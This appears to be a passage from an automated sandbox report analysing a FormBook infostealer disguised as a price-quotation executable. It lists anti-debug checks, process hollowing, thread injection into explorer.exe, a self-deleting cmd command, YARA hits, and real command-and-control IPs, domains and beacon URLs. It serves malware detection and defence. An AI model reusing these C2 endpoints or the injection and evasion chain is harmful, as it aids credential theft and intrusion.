Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CDA537 mov eax, dword ptr fs:[00000030h] 17_2_04CDA537
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28ED6 mov eax, dword ptr fs:[00000030h] 17_2_04D28ED6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C836CC mov eax, dword ptr fs:[00000030h] 17_2_04C836CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C98EC7 mov eax, dword ptr fs:[00000030h] 17_2_04C98EC7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0FEC0 mov eax, dword ptr fs:[00000030h] 17_2_04D0FEC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C676E2 mov eax, dword ptr fs:[00000030h] 17_2_04C676E2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C816E0 mov ecx, dword ptr fs:[00000030h] 17_2_04C816E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEFE87 mov eax, dword ptr fs:[00000030h] 17_2_04CEFE87
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h] 17_2_04C8D294
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h] 17_2_04C8D294
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD46A7 mov eax, dword ptr fs:[00000030h] 17_2_04CD46A7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h] 17_2_04C6AAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h] 17_2_04C6AAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8FAB0 mov eax, dword ptr fs:[00000030h] 17_2_04C8FAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CE4257 mov eax, dword ptr fs:[00000030h] 17_2_04CE4257
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6766D mov eax, dword ptr fs:[00000030h] 17_2_04C6766D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h] 17_2_04D0B260
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h] 17_2_04D0B260
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28A62 mov eax, dword ptr fs:[00000030h] 17_2_04D28A62
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9927A mov eax, dword ptr fs:[00000030h] 17_2_04C9927A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h] 17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h] 17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h] 17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h] 17_2_04C8A61C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h] 17_2_04C8A61C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C73A1C mov eax, dword ptr fs:[00000030h] 17_2_04C73A1C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5E620 mov eax, dword ptr fs:[00000030h] 17_2_04C5E620
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0FE3F mov eax, dword ptr fs:[00000030h] 17_2_04D0FE3F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C937F5 mov eax, dword ptr fs:[00000030h] 17_2_04C937F5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h] 17_2_04C61B8F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h] 17_2_04C61B8F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0D380 mov ecx, dword ptr fs:[00000030h] 17_2_04D0D380
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8B390 mov eax, dword ptr fs:[00000030h] 17_2_04C8B390
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h] 17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h] 17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h] 17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D1138A mov eax, dword ptr fs:[00000030h] 17_2_04D1138A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D25BA5 mov eax, dword ptr fs:[00000030h] 17_2_04D25BA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5DB40 mov eax, dword ptr fs:[00000030h] 17_2_04C5DB40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6EF40 mov eax, dword ptr fs:[00000030h] 17_2_04C6EF40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28B58 mov eax, dword ptr fs:[00000030h] 17_2_04D28B58
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5F358 mov eax, dword ptr fs:[00000030h] 17_2_04C5F358
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5DB60 mov ecx, dword ptr fs:[00000030h] 17_2_04C5DB60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6FF60 mov eax, dword ptr fs:[00000030h] 17_2_04C6FF60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h] 17_2_04C83B7A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h] 17_2_04C83B7A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28F6A mov eax, dword ptr fs:[00000030h] 17_2_04D28F6A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h] 17_2_04C8A70E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h] 17_2_04C8A70E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D1131B mov eax, dword ptr fs:[00000030h] 17_2_04D1131B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04CEFF10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04CEFF10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h] 17_2_04D2070D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h] 17_2_04D2070D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h] 17_2_04C54F2E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h] 17_2_04C54F2E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8E730 mov eax, dword ptr fs:[00000030h] 17_2_04C8E730
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00409B50 LdrLoadDll, 3_2_00409B50

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe Network Connect: 154.208.173.139 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe Network Connect: 109.106.246.165 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe Network Connect: 185.107.56.60 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe Domain query: www.patrickandmaxine.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1060000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Memory written: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 3472 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.281211852.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.311360069.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491948 Sample: PRICE_REQUEST_QUOTATION.exe Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 33 www.thenewtocsin.com 2->33 35 parkingpage.namecheap.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 7 other signatures 2->49 11 PRICE_REQUEST_QUOTATION.exe 17 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\akepwc.dll, PE32 11->31 dropped 61 Detected unpacking (changes PE section rights) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 PRICE_REQUEST_QUOTATION.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.babeshotnud.com 185.107.56.60, 49783, 80 NFORCENL Netherlands 18->37 39 nailsestetic.space 109.106.246.165, 49781, 80 NETNET-ASRS Serbia 18->39 41 12 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 wscript.exe 18->22         started        25 autoconv.exe 18->25         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
35.246.6.109
 td-balancer-euw2-6-109.wixdns.net United States
15169 GOOGLEUS false
154.208.173.139
 www.futurodr.com Seychelles
40065 CNSERVERSUS true
185.107.56.60
 www.babeshotnud.com Netherlands
43350 NFORCENL true
34.102.136.180
 teelandcompany.com United States
15169 GOOGLEUS false
109.106.246.165
 nailsestetic.space Serbia
199493 NETNET-ASRS true

Contacted Domains

Name IP Active
nailsestetic.space 109.106.246.165 true
www.futurodr.com 154.208.173.139 true
www.babeshotnud.com 185.107.56.60 true
td-balancer-euw2-6-109.wixdns.net 35.246.6.109 true
parkingpage.namecheap.com 198.54.117.212 true
teelandcompany.com 34.102.136.180 true
www.thenewtocsin.com unknown unknown
www.4-6-2.com unknown unknown
www.snackithalal.com unknown unknown
www.nailsestetic.space unknown unknown
www.appleluis.host unknown unknown
www.teelandcompany.com unknown unknown
www.patrickandmaxine.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc true
  • Avira URL Cloud: malware
 unknown
http://www.futurodr.com/rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc true
  • Avira URL Cloud: safe
 unknown
http://www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc true
  • Avira URL Cloud: safe
 unknown
www.nudesalon.digital/rgoe/ true
  • Avira URL Cloud: safe
 low
http://www.patrickandmaxine.com/rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc false
  • Avira URL Cloud: safe
 unknown
http://www.teelandcompany.com/rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc false
  • Avira URL Cloud: safe
 unknown